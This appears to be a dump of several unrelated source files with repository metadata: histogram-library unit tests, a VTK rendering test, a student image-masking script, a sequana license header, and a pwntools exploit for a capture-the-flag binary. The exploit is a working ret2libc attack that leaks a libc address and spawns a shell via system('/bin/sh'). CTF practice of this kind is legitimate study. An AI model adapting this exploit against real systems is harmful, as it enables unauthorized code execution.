self.assertEqual(h._content.tolist(), [[0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.2, 0.020000000000000004], [0.2, 0.020000000000000004], [0.1, 0.010000000000000002], [0.0, 0.0], [0.0, 0.0], [1.0, 1.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0]])
h = Hist(bin("x", 10, 10, 11)).weight("y")
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[0.1, 0.1, 0.1, 0.1, 0.1, 1.0])
self.assertEqual(h._content.tolist(), [[0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.2, 0.020000000000000004], [0.2, 0.020000000000000004], [0.1, 0.010000000000000002], [0.0, 0.0], [0.0, 0.0], [1.0, 1.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0]])
def test_bin_filter(self):
h = Hist(bin("x", 10, 10, 11), filter="y > 0")
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[-1, -1, -1, 1, 1, 1])
self.assertEqual(h._content.tolist(), [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [1, 1], [1, 1], [0, 0], [0, 0], [1, 1], [0, 0], [0, 0], [0, 0]])
h = Hist(bin("x", 10, 10, 11)).filter("y > 0")
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[-1, -1, -1, 1, 1, 1])
self.assertEqual(h._content.tolist(), [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [1, 1], [1, 1], [0, 0], [0, 0], [1, 1], [0, 0], [0, 0], [0, 0]])
def test_bin_weight_filter1(self):
h = Hist(bin("x", 10, 10, 11), weight=2, filter="y > 0")
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[-1, -1, -1, 1, 1, 1])
self.assertEqual(h._content.tolist(), [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [2, 4], [2, 4], [0, 0], [0, 0], [2, 4], [0, 0], [0, 0], [0, 0]])
h = Hist(bin("x", 10, 10, 11)).weight(2).filter("y > 0")
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[-1, -1, -1, 1, 1, 1])
self.assertEqual(h._content.tolist(), [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [2, 4], [2, 4], [0, 0], [0, 0], [2, 4], [0, 0], [0, 0], [0, 0]])
def test_bin_weight_filter2(self):
h = Hist(bin("x", 10, 10, 11), weight="y", filter="y > 0")
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[-0.1, -0.1, -0.1, 0.1, 0.1, 1.0])
self.assertEqual(h._content.tolist(), [[0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.1, 0.010000000000000002], [0.1, 0.010000000000000002], [0.0, 0.0], [0.0, 0.0], [1.0, 1.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0]])
h = Hist(bin("x", 10, 10, 11)).weight("y").filter("y > 0")
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[-0.1, -0.1, -0.1, 0.1, 0.1, 1.0])
self.assertEqual(h._content.tolist(), [[0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.1, 0.010000000000000002], [0.1, 0.010000000000000002], [0.0, 0.0], [0.0, 0.0], [1.0, 1.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0]])
def test_bin_big(self):
numpy.random.seed(12345)
xdata = numpy.round(numpy.random.normal(0, 1, 10000), 2)
weights = numpy.random.uniform(-2, 2, 10000)
both = numpy.random.randint(0, 9999, 10)
xdata[numpy.random.randint(0, 9999, 10)] = numpy.nan
weights[numpy.random.randint(0, 9999, 10)] = numpy.nan
xdata[both] = numpy.nan
weights[both] = numpy.nan
nn = ~numpy.isnan(xdata)
nnweights = weights.copy()
nnweights[numpy.isnan(weights)] = 0.0
nnweights2 = nnweights**2
with numpy.errstate(invalid="ignore"):
under = numpy.count_nonzero(xdata < 0.0)
bin0 = numpy.count_nonzero(numpy.logical_and(0.0 <= xdata, xdata < 0.1))
bin1 = numpy.count_nonzero(numpy.logical_and(0.1 <= xdata, xdata < 0.2))
bin2 = numpy.count_nonzero(numpy.logical_and(0.2 <= xdata, xdata < 0.3))
bin3 = numpy.count_nonzero(numpy.logical_and(0.3 <= xdata, xdata < 0.4))
bin4 = numpy.count_nonzero(numpy.logical_and(0.4 <= xdata, xdata < 0.5))
bin5 = numpy.count_nonzero(numpy.logical_and(0.5 <= xdata, xdata < 0.6))
bin6 = numpy.count_nonzero(numpy.logical_and(0.6 <= xdata, xdata < 0.7))
bin7 = numpy.count_nonzero(numpy.logical_and(0.7 <= xdata, xdata < 0.8))
bin8 = numpy.count_nonzero(numpy.logical_and(0.8 <= xdata, xdata < 0.9))
bin9 = numpy.count_nonzero(numpy.logical_and(0.9 <= xdata, xdata < 1.0))
over = numpy.count_nonzero(xdata >= 1.0)
nan = numpy.count_nonzero(numpy.isnan(xdata))
wunder = numpy.sum(nnweights * numpy.logical_and(nn, xdata < 0.0))
wbin0 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.0 <= xdata, xdata < 0.1)))
wbin1 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.1 <= xdata, xdata < 0.2)))
wbin2 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.2 <= xdata, xdata < 0.3)))
wbin3 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.3 <= xdata, xdata < 0.4)))
wbin4 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.4 <= xdata, xdata < 0.5)))
wbin5 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.5 <= xdata, xdata < 0.6)))
wbin6 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.6 <= xdata, xdata < 0.7)))
wbin7 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.7 <= xdata, xdata < 0.8)))
wbin8 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.8 <= xdata, xdata < 0.9)))
wbin9 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.9 <= xdata, xdata < 1.0)))
wover = numpy.sum(nnweights * numpy.logical_and(nn, (xdata >= 1.0)))
wnan = numpy.sum(nnweights * numpy.isnan(xdata))
w2under = numpy.sum(nnweights2 * numpy.logical_and(nn, (xdata < 0.0)))
w2bin0 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.0 <= xdata, xdata < 0.1)))
w2bin1 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.1 <= xdata, xdata < 0.2)))
w2bin2 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.2 <= xdata, xdata < 0.3)))
w2bin3 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.3 <= xdata, xdata < 0.4)))
w2bin4 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.4 <= xdata, xdata < 0.5)))
w2bin5 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.5 <= xdata, xdata < 0.6)))
w2bin6 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.6 <= xdata, xdata < 0.7)))
w2bin7 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.7 <= xdata, xdata < 0.8)))
w2bin8 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.8 <= xdata, xdata < 0.9)))
w2bin9 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.9 <= xdata, xdata < 1.0)))
w2over = numpy.sum(nnweights2 * numpy.logical_and(nn, (xdata >= 1.0)))
w2nan = numpy.sum(nnweights2 * numpy.isnan(xdata))
for underflow in False, True:
for overflow in False, True:
for nanflow in False, True:
compare = [bin0, bin1, bin2, bin3, bin4, bin5, bin6, bin7, bin8, bin9]
if underflow:
compare.insert(0, under)
if overflow:
compare.append(over)
if nanflow:
compare.append(nan)
# h = Hist(bin("x", 10, 0, 1, underflow=underflow, overflow=overflow, nanflow=nanflow))
# h.fill(x=xdata)
# self.assertEqual(h._content.reshape(-1).tolist(), compare)
compare = [[wbin0, w2bin0], [wbin1, w2bin1], [wbin2, w2bin2], [wbin3, w2bin3], [wbin4, w2bin4], [wbin5, w2bin5], [wbin6, w2bin6], [wbin7, w2bin7], [wbin8, w2bin8], [wbin9, w2bin9]]
if underflow:
compare.insert(0, [wunder, w2under])
if overflow:
compare.append([wover, w2over])
if nanflow:
compare.append([wnan, w2nan])
h = Hist(bin("x", 10, 0, 1, underflow=underflow, overflow=overflow, nanflow=nanflow)).weight("w")
h.fill(x=xdata, w=weights)
self.assertTrue(numpy.absolute((h._content - numpy.array(compare)).reshape(-1)).max() < 1e-10)
with numpy.errstate(invalid="ignore"):
under = numpy.count_nonzero(xdata <= 0.0)
bin0 = numpy.count_nonzero(numpy.logical_and(0.0 < xdata, xdata <= 0.1))
bin1 = numpy.count_nonzero(numpy.logical_and(0.1 < xdata, xdata <= 0.2))
bin2 = numpy.count_nonzero(numpy.logical_and(0.2 < xdata, xdata <= 0.3))
bin3 = numpy.count_nonzero(numpy.logical_and(0.3 < xdata, xdata <= 0.4))
bin4 = numpy.count_nonzero(numpy.logical_and(0.4 < xdata, xdata <= 0.5))
bin5 = numpy.count_nonzero(numpy.logical_and(0.5 < xdata, xdata <= 0.6))
bin6 = numpy.count_nonzero(numpy.logical_and(0.6 < xdata, xdata <= 0.7))
bin7 = numpy.count_nonzero(numpy.logical_and(0.7 < xdata, xdata <= 0.8))
bin8 = numpy.count_nonzero(numpy.logical_and(0.8 < xdata, xdata <= 0.9))
bin9 = numpy.count_nonzero(numpy.logical_and(0.9 < xdata, xdata <= 1.0))
over = numpy.count_nonzero(xdata > 1.0)
nan = numpy.count_nonzero(numpy.isnan(xdata))
wunder = numpy.sum(nnweights * numpy.logical_and(nn, xdata <= 0.0))
wbin0 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.0 < xdata, xdata <= 0.1)))
wbin1 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.1 < xdata, xdata <= 0.2)))
wbin2 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.2 < xdata, xdata <= 0.3)))
wbin3 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.3 < xdata, xdata <= 0.4)))
wbin4 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.4 < xdata, xdata <= 0.5)))
wbin5 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.5 < xdata, xdata <= 0.6)))
wbin6 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.6 < xdata, xdata <= 0.7)))
wbin7 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.7 < xdata, xdata <= 0.8)))
wbin8 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.8 < xdata, xdata <= 0.9)))
wbin9 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.9 < xdata, xdata <= 1.0)))
wover = numpy.sum(nnweights * numpy.logical_and(nn, (xdata > 1.0)))
wnan = numpy.sum(nnweights * numpy.isnan(xdata))
w2under = numpy.sum(nnweights2 * numpy.logical_and(nn, (xdata <= 0.0)))
w2bin0 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.0 < xdata, xdata <= 0.1)))
w2bin1 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.1 < xdata, xdata <= 0.2)))
w2bin2 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.2 < xdata, xdata <= 0.3)))
w2bin3 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.3 < xdata, xdata <= 0.4)))
w2bin4 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.4 < xdata, xdata <= 0.5)))
w2bin5 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.5 < xdata, xdata <= 0.6)))
w2bin6 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.6 < xdata, xdata <= 0.7)))
w2bin7 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.7 < xdata, xdata <= 0.8)))
w2bin8 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.8 < xdata, xdata <= 0.9)))
w2bin9 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.9 < xdata, xdata <= 1.0)))
w2over = numpy.sum(nnweights2 * numpy.logical_and(nn, (xdata > 1.0)))
w2nan = numpy.sum(nnweights2 * numpy.isnan(xdata))
for underflow in False, True:
for overflow in False, True:
for nanflow in False, True:
compare = [bin0, bin1, bin2, bin3, bin4, bin5, bin6, bin7, bin8, bin9]
if underflow:
compare.insert(0, under)
if overflow:
compare.append(over)
if nanflow:
compare.append(nan)
h = Hist(bin("x", 10, 0, 1, underflow=underflow, overflow=overflow, nanflow=nanflow, closedlow=False))
h.fill(x=xdata)
self.assertEqual(h._content.reshape(-1).tolist(), compare)
compare = [[wbin0, w2bin0], [wbin1, w2bin1], [wbin2, w2bin2], [wbin3, w2bin3], [wbin4, w2bin4], [wbin5, w2bin5], [wbin6, w2bin6], [wbin7, w2bin7], [wbin8, w2bin8], [wbin9, w2bin9]]
if underflow:
compare.insert(0, [wunder, w2under])
if overflow:
compare.append([wover, w2over])
if nanflow:
compare.append([wnan, w2nan])
h = Hist(bin("x", 10, 0, 1, underflow=underflow, overflow=overflow, nanflow=nanflow, closedlow=False)).weight("w")
h.fill(x=xdata, w=weights)
self.assertTrue(numpy.absolute((h._content - numpy.array(compare)).reshape(-1)).max() < 1e-10)
def test_intbin(self):
h = Hist(intbin("x", 0, 10, underflow=True, overflow=True))
h.fill(x=range(-5, 15))
self.assertEqual(h._content.tolist(), [[5], [1], [1], [1], [1], [1], [1], [1], [1], [1], [1], [1], [4]])
h = Hist(intbin("x", 0, 10, underflow=True, overflow=False))
h.fill(x=range(-5, 15))
self.assertEqual(h._content.tolist(), [[5], [1], [1], [1], [1], [1], [1], [1], [1], [1], [1], [1]])
h = Hist(intbin("x", 0, 10, underflow=False, overflow=True))
h.fill(x=range(-5, 15))
self.assertEqual(h._content.tolist(), [[1], [1], [1], [1], [1], [1], [1], [1], [1], [1], [1], [4]])
h = Hist(intbin("x", 0, 10, underflow=False, overflow=False))
h.fill(x=range(-5, 15))
self.assertEqual(h._content.tolist(), [[1], [1], [1], [1], [1], [1], [1], [1], [1], [1], [1]])
def test_split(self):
h = Hist(split("x", 3))
h.fill(x=[0, 1, 2, 3, 4, 5, 6])
self.assertEqual(h._content.tolist(), [[3], [4], [0]])
h = Hist(split("x", 3))
h.fill(x=[0, 1, 2, 3, 4, 5, numpy.nan])
self.assertEqual(h._content.tolist(), [[3], [3], [1]])
h = Hist(split("x", (2.5, 3.5)))
h.fill(x=[0, 1, 2, 3, 4, 5, 6])
self.assertEqual(h._content.tolist(), [[3], [1], [3], [0]])
h = Hist(split("x", (2.5, 3.5, 5.0)))
h.fill(x=[0, 1, 2, 3, 4, 5, 6])
self.assertEqual(h._content.tolist(), [[3], [1], [1], [2], [0]])
h = Hist(split("x", (2.5, 3.5, 5.0), closedlow=False))
h.fill(x=[0, 1, 2, 3, 4, 5, 6])
self.assertEqual(h._content.tolist(), [[3], [1], [2], [1], [0]])
under = [[2]]
over = [[4]]
nan = [[1]]
for underflow in (False, True):
for overflow in (False, True):
for nanflow in (False, True):
if underflow or overflow or nanflow:
h = Hist(split("x", 3, underflow=underflow, overflow=overflow, nanflow=nanflow))
h.fill(x=[numpy.nan, 1, 2, 3, 4, 5, 6])
self.assertEqual(h._content.tolist(), (under if underflow else []) + (over if overflow else []) + (nan if nanflow else []))
under = [[2]]
over = [[1]]
nan = [[1]]
for underflow in (False, True):
for overflow in (False, True):
for nanflow in (False, True):
h = Hist(split("x", (2.5, 3.5, 5.0), underflow=underflow, overflow=overflow, nanflow=nanflow, closedlow=False))
h.fill(x=[numpy.nan, 1, 2, 3, 4, 5, 6])
self.assertEqual(h._content.tolist(), (under if underflow else []) + [[1], [2]] + (over if overflow else []) + (nan if nanflow else []))
def test_cut(self):
h = Hist(cut("p"))
h.fill(p=[False, True, True])
self.assertEqual(h._content.tolist(), [[1], [2]])
h = Hist(cut("x > 3"))
h.fill(x=[1, 2, 3, 4, 5])
self.assertEqual(h._content.tolist(), [[3], [2]])
h = Hist(cut("x > 3 and p"))
h.fill(x=[1, 2, 3, 4, 5], p=[True, False, True, False, True])
self.assertEqual(h._content.tolist(), [[4], [1]])
h = Hist(cut("x > 3 and y % 2 == 0"))
h.fill(x=[1, 2, 3, 4, 5], y=[0, 1, 2, 3, 4])
self.assertEqual(h._content.tolist(), [[4], [1]])
h = Hist(cut("x > 3 and y % 2 == 0"), split("x", 3.5))
h.fill(x=[1, 2, 3, 4, 5], y=[0, 1, 2, 3, 4])
self.assertEqual(h._content.tolist(), [[[3], [1], [0]], [[0], [1], [0]]])
def test_profile(self):
h = Hist(bin("x", 10, 10, 11), profile("y"))
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[0.1, 0.1, 0.1, 0.1, 0.1, 1.0])
self.assertEqual(h._content.tolist(), [[0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.2, 0.020000000000000004, 2.0], [0.2, 0.020000000000000004, 2.0], [0.1, 0.010000000000000002, 1.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [1.0, 1.0, 1.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
h = Hist(bin("x", 10, 10, 11), profile("y"), profile("2*y"))
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[0.1, 0.1, 0.1, 0.1, 0.1, 1.0])
self.assertEqual(h._content.tolist(), [[0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0], [0.2, 0.020000000000000004, 0.4, 0.08000000000000002, 2.0], [0.2, 0.020000000000000004, 0.4, 0.08000000000000002, 2.0], [0.1, 0.010000000000000002, 0.2, 0.04000000000000001, 1.0], [0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0], [1.0, 1.0, 2.0, 4.0, 1.0], [0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0]])
def test_groupby(self):
h = Hist(groupby("c"), bin("x", 3, 1.0, 4.0, underflow=False, overflow=False, nanflow=False))
h.fill(c=["one", "two", "three", "two", "one", "one", "one"], x=[1, 2, 3, 2, 1, 1, 3])
self.assertEqual(h._content["one"].tolist(), [[3], [0], [1]])
self.assertEqual(h._content["two"].tolist(), [[0], [2], [0]])
self.assertEqual(h._content["three"].tolist(), [[0], [0], [1]])
def test_groupby_groupby(self):
h = Hist(groupby("c1"), groupby("c2"), bin("x", 1, 1.0, 2.0, underflow=False, overflow=False, nanflow=False))
h.fill(c1=["one", "two", "one", "two"], c2=["uno", "uno", "dos", "dos"], x=[1, 1, 1, 1])
self.assertEqual(h._content["one"]["uno"].tolist(), [[1]])
self.assertEqual(h._content["two"]["uno"].tolist(), [[1]])
self.assertEqual(h._content["one"]["dos"].tolist(), [[1]])
self.assertEqual(h._content["two"]["dos"].tolist(), [[1]])
def test_groupbin(self):
h = Hist(groupbin("x", 10.0), bin("y", 4, 1.0, 5.0, underflow=False, overflow=False, nanflow=False))
h.fill(x=[0, 10, 15, 20], y=[1, 2, 3, 4])
self.assertEqual(h._content[0.0].tolist(), [[1], [0], [0], [0]])
self.assertEqual(h._content[10.0].tolist(), [[0], [1], [1], [0]])
self.assertEqual(h._content[20.0].tolist(), [[0], [0], [0], [1]])
h = Hist(groupbin("x", 10.0, origin=1.0), bin("y", 4, 1.0, 5.0, underflow=False, overflow=False, nanflow=False))
h.fill(x=[0, 10, 15, 20], y=[1, 2, 3, 4])
self.assertEqual(h._content[-9.0].tolist(), [[1], [0], [0], [0]])
self.assertEqual(h._content[1.0].tolist(), [[0], [1], [0], [0]])
self.assertEqual(h._content[11.0].tolist(), [[0], [0], [1], [1]])
def test_groupby_groupbin(self):
h = Hist(bin("y", 4, 1.0, 5.0, underflow=False, overflow=False, nanflow=False), groupby("c"), groupbin("x", 10.0))
h.fill(c=["one", "one", "two", "two"], x=[0, 10, 15, 20], y=[1, 2, 3, 4])
self.assertEqual(h._content["one"][0.0].tolist(), [[1], [0], [0], [0]])
self.assertEqual(h._content["one"][10.0].tolist(), [[0], [1], [0], [0]])
self.assertEqual(h._content["two"][10.0].tolist(), [[0], [0], [1], [0]])
self.assertEqual(h._content["two"][20.0].tolist(), [[0], [0], [0], [1]])
h = Hist(groupbin("x", 10.0), bin("y", 4, 1.0, 5.0, underflow=False, overflow=False, nanflow=False), groupby("c"))
h.fill(c=["one", "one", "two", "two"], x=[0, 10, 15, 20], y=[1, 2, 3, 4])
self.assertEqual(h._content[0.0]["one"].tolist(), [[1], [0], [0], [0]])
self.assertEqual(h._content[10.0]["one"].tolist(), [[0], [1], [0], [0]])
self.assertEqual(h._content[10.0]["two"].tolist(), [[0], [0], [1], [0]])
self.assertEqual(h._content[20.0]["two"].tolist(), [[0], [0], [0], [1]])
def test_pickle(self):
h = Hist(split("x", (1, 2, 3)), bin("y", 10, 0, 1), defs={"y": "x + 0.1"}, weight="sqrt(x)", filter="x > 2")
self.assertEqual(h, pickle.loads(pickle.dumps(h)))
h.fill(x=[1, 2, 3])
self.assertEqual(h, pickle.loads(pickle.dumps(h)))
def test_json(self):
h = Hist(split("x", (1, 2, 3)), bin("y", 10, 0, 1), defs={"y": "x + 0.1"}, weight="sqrt(x)", filter="x > 2")
self.assertEqual(h, Hist.fromjson(h.tojson()))
h.fill(x=[1, 2, 3])
self.assertEqual(h, Hist.fromjson(h.tojson()))
| 62.5898 | 497 | 0.537516 |
4a18abc567d61bc8887e015eb4736647c6efd6cb | 869 | py | Python | xctf/pwn/pwn-100/exp.py | haysengithub/ctf | c2cefed8470f40d0cb6bc4d1ae941a70936ea497 | ["MIT"] | stars: null | issues: null | forks: null |
from pwn import *
context(arch="amd64", os="linux", log_level="debug", terminal=["tmux", "splitw", "-h"])
p = process("./pwn")
# gdb.attach(p, "b *0x4006b8")
elf = ELF("./pwn")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
pop_rdi_ret = 0x0000000000400763
elf_got = elf.got["puts"]
elf_plt = elf.plt["puts"]
main_addr = 0x4006b8  # elf.symbols["main"]
# Stage 1: leak puts@got through puts@plt, then return to main for a second pass.
payload = b"A" * (0x40 + 8) + p64(pop_rdi_ret) + p64(elf_got) + p64(elf_plt) + p64(main_addr)
payload = payload.ljust(200, b"A")
p.sendline(payload)
# The leaked address ends in \x7f; pad it back out to a full 8-byte little-endian value.
xx = p.recvuntil(b'\x7f\x0a')[5:-1] + b'\x00\x00'
puts_leak = u64(xx)
print(hex(puts_leak))
libc.address = puts_leak - libc.symbols["puts"]
system_addr = libc.symbols["system"]
bin_sh_addr = next(libc.search(b"/bin/sh"))
print(hex(system_addr), hex(bin_sh_addr))
# Stage 2: same 0x40 + 8 bytes of padding to the saved return address, then system("/bin/sh").
payload = b"A" * (0x40 + 8) + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)
payload = payload.ljust(200, b"A")
p.sendline(payload)
p.interactive()
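# Flow sketch: the first chain calls puts(puts@got) via puts@plt to leak a libc
# address, then returns to main for a second pass; the leak rebases libc so the
# second chain can call system("/bin/sh"). The padding size and the pop rdi; ret
# gadget address are specific to this binary.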
| 28.966667 | 82 | 0.715765 |
4a18ace592b97e1a77daa10530157bfab282ca69 | 2,061 | py | Python | IMU/VTK-6.2.0/Filters/Modeling/Testing/Python/TestRibbonAndTube.py | timkrentz/SunTracker | 9a189cc38f45e5fbc4e4c700d7295a871d022795 | ["MIT"] | stars: 4 (2016-03-30T14:31:52.000Z .. 2019-02-02T05:01:32.000Z) | issues: null | forks: 2 (2019-08-30T23:36:13.000Z .. 2019-11-08T16:52:01.000Z) |
#!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# create pipeline
#
reader = vtk.vtkPolyDataReader()
reader.SetFileName("" + str(VTK_DATA_ROOT) + "/Data/vtk.vtk")
# Read a ruler texture
r = vtk.vtkPNGReader()
r.SetFileName("" + str(VTK_DATA_ROOT) + "/Data/ruler.png")
atext = vtk.vtkTexture()
atext.SetInputConnection(r.GetOutputPort())
atext.InterpolateOn()
# produce some ribbons
ribbon = vtk.vtkRibbonFilter()
ribbon.SetInputConnection(reader.GetOutputPort())
ribbon.SetWidth(0.1)
ribbon.SetGenerateTCoordsToUseLength()
ribbon.SetTextureLength(1.0)
ribbon.UseDefaultNormalOn()
ribbon.SetDefaultNormal(0,0,1)
ribbonMapper = vtk.vtkPolyDataMapper()
ribbonMapper.SetInputConnection(ribbon.GetOutputPort())
ribbonActor = vtk.vtkActor()
ribbonActor.SetMapper(ribbonMapper)
ribbonActor.GetProperty().SetColor(1,1,0)
ribbonActor.SetTexture(atext)
# produce some tubes
tuber = vtk.vtkTubeFilter()
tuber.SetInputConnection(reader.GetOutputPort())
tuber.SetRadius(0.1)
tuber.SetNumberOfSides(12)
tuber.SetGenerateTCoordsToUseLength()
tuber.SetTextureLength(0.5)
tuber.CappingOn()
tubeMapper = vtk.vtkPolyDataMapper()
tubeMapper.SetInputConnection(tuber.GetOutputPort())
tubeActor = vtk.vtkActor()
tubeActor.SetMapper(tubeMapper)
tubeActor.GetProperty().SetColor(1,1,0)
tubeActor.SetTexture(atext)
tubeActor.AddPosition(5,0,0)
# Create the RenderWindow, Renderer and both Actors
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
#
ren1.AddActor(ribbonActor)
ren1.AddActor(tubeActor)
ren1.SetBackground(1,1,1)
renWin.SetSize(900,350)
ren1.ResetCamera()
ren1.GetActiveCamera().Zoom(4)
# render the image
#
renWin.Render()
# prevent the tk window from showing up then start the event loop
threshold = 15
# --- end of script --
| 30.308824 | 66 | 0.769044 |
4a18acea1241dc6956e8b15d931e1692ab9540fe | 2,355 | py | Python | main.py | DrEuler/MakeMaskPython | 608ebfbb5f1e4e1f20197bea56b24e3887ecbe6c | ["MIT"] | stars: null | issues: null | forks: null |
from __future__ import print_function
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import os.path
import numpy as np # 'as' lets us use standard abbreviations
'''Read the image data'''
# Get the directory of this python script
directory = os.path.dirname(os.path.abspath(__file__))
# Build an absolute filename from directory + filename
filename = os.path.join(directory, 'woman.jpg')
filename2 = os.path.join(directory, 'mask.png')
# Read the image data into an array
img = plt.imread(filename)
img2 = plt.imread(filename2)
'''Show the image data'''
# Create a figure with 2 subplots
fig, ax = plt.subplots(1, 2)
# Show the image data in a subplot
ax[0].imshow(img, interpolation='none')
ax[1].imshow(img2, interpolation='none')
# Saves the figure
###
# Make a rectangle of pixels yellow
###
###
# Change a region if condition is True
###
"""
height = len(img)
width = len(img[0])
for r in range(155):
for c in range(width):
if sum(img[r][c])>500: # brightness R+G+B goes up to 3*255=765
img[r][c]=[255,0,255] # R + B = magenta
"""
#for the sky
widthx = len(img[0])
for rx in range(155):
for cx in range(widthx):
if sum(img[rx][cx])>500: # brightness R+G+B goes up to 3*255=765
            img[rx][cx]=[255, 255, 0] # R + G = yellow
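# A vectorized sketch of the same sky mask (assumes img is a writable numpy array):
#   sky = img[:155].sum(axis=2) > 500   # per-pixel brightness R+G+B
#   img[:155][sky] = [255, 255, 0]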
height = len(img)
width = len(img[0])
for row in range(400, 487):
for column in range(100, 170):
        img[row][column] = [255, 0, 0] # red
fig.savefig('women2')
print(img)
print(type(img))
print(len(img))
print(len(img[0]))
'''4. Arrays and lists are similar in that both store an ordered
sequence of elements; they differ in that an array holds a single
data type, while a list can hold multiple data types.
'''
"""
5. the image height = the number of rows of pixels = 1000
the image width = the number of columns = 5
the green intensity at (5,9) = 95
the red intensity at (4,10) = 83
the red intensity of the 25th pixel in the 50th row = 104
"""
"""
7.
a. In lines 28-31 of this code the algorithm used is that
the code checks to see how many rows of pixels are in range
of 155. The code than checkks the brightness of the pixels.
Then if the brightness is more than 500, the color will
appear to be sky.
"""
'''
8.
'''
"""CONCLUSION QUESTIONS
1. Digital Images contain data called pixels
2.
3.
"""
| 25.053191 | 72 | 0.669214 |
4a18aceeabbcea68b1ece4aae7f2b828bded4750 | 931 | py | Python | sequana/lazy.py | cokelaer/sequana | da35de12b45f38b4fa488c7a15a6d9829890b44e | ["BSD-3-Clause"] | stars: null | issues: null | forks: null |
# -*- coding: utf-8 -*-
#
# This file is part of Sequana software
#
# Copyright (c) 2016-2017 - Sequana Development Team
#
# File author(s): Sequana Development Team
#
# Distributed under the terms of the 3-clause BSD license.
# The full license is in the LICENSE file, distributed with this software.
#
# website: https://github.com/sequana/sequana
# documentation: http://sequana.readthedocs.io
#
##############################################################################
